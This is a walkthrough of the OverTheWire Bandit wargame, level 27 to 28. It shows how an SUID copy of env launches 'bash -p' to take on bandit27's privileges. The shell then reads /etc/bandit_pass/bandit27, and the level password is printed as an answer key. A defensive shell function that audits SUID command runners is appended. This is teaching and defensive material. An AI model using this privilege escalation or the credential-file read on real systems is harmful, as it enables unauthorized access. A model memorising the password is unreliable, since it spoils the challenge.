OverTheWire - Bandit: Level 27 to Level 28
Good job getting a shell! Now hurry and grab the password for bandit27!
Using the shell created in the previous level, we can find an executable with the SUID bit set.
    -rwsr-x--- 1 bandit27 bandit26 14876 Oct 5 06:19 bandit27-do
Let’s take a look at the usage of this executable:
    $ ./bandit27-do --help
    Usage: env [OPTION]... [-] [NAME=VALUE]... [COMMAND [ARG]...]
    Set each NAME to VALUE in the environment and run COMMAND.

    Mandatory arguments to long options are mandatory for short options too.
      -i, --ignore-environment  start with an empty environment
      -0, --null           end each output line with NUL, not newline
      -u, --unset=NAME     remove variable from the environment
      -C, --chdir=DIR      change working directory to DIR
      -S, --split-string=S  process and split S into separate arguments;
                            used to pass multiple arguments on shebang lines
          --block-signal[=SIG]    block delivery of SIG signal(s) to COMMAND
          --default-signal[=SIG]  reset handling of SIG signal(s) to the default
          --ignore-signal[=SIG]   set handling of SIG signals(s) to do nothing
          --list-signal-handling  list non default signal handling to stderr
      -v, --debug          print verbose information for each processing step
          --help     display this help and exit
          --version  output version information and exit

    A mere - implies -i. If no COMMAND, print the resulting environment.

    SIG may be a signal name like 'PIPE', or a signal number like '13'.
    Without SIG, all known signals are included. Multiple signals can be
    comma-separated.

    GNU coreutils online help: <https://www.gnu.org/software/coreutils/>
    Full documentation <https://www.gnu.org/software/coreutils/env>
    or available locally via: info '(coreutils) env invocation'
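The first line shows that this is a copy of the /usr/bin/env executable, a tool for running a command with a modified environment. Because the copy is SUID and owned by bandit27, any command it launches starts with bandit27's effective user ID, so it can be used to gain access to a bash shell as bandit27.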
    $ ./bandit27-do /bin/bash -p
    $ whoami
    bandit27
    $ cat /etc/bandit_pass/bandit27
    YnQpBuifNMas1hcUFk70ZmqkhUU2EuaS
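Note the -p flag passed to bash. It is needed so that bash does not drop the elevated privileges: without -p, a bash started with an effective user ID different from its real user ID resets the effective ID to the real one.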
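
From the defender's side, the misconfiguration in this level is a renamed, SUID copy of env. The following is an added example, not part of the original write-up: a POSIX shell function that reports SUID files whose contents match a known command runner, whatever they are named. The function name `audit_suid_runners` and the `RUNNERS` list are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not from the original write-up): report SUID files that are
# byte-for-byte copies of programs which run a caller-supplied command.

# Illustrative list (an assumption, extend for your environment).
RUNNERS="env bash sh dash find nice timeout xargs"

# audit_suid_runners [DIR...]  (hypothetical helper name)
# Prints "<suid file> is a copy of <runner>" for each match; defaults to /.
# File names containing newlines are not handled.
audit_suid_runners() {
    [ "$#" -gt 0 ] || set -- /
    find "$@" -xdev -type f -perm -4000 2>/dev/null |
    while IFS= read -r f; do
        for name in $RUNNERS; do
            ref=$(command -v "$name" 2>/dev/null) || continue
            case "$ref" in
                /*) ;;              # real file on PATH
                *)  continue ;;     # builtin or function: nothing to compare
            esac
            # Compare contents, not names: the copy may be renamed.
            if cmp -s "$f" "$ref" 2>/dev/null; then
                printf '%s is a copy of %s\n' "$f" "$ref"
                break
            fi
        done
    done
}

# Usage: . ./audit_suid_runners.sh && audit_suid_runners /home /opt /usr/local
```

Run it as root so that files like the one above, readable only by owner and group, can be compared.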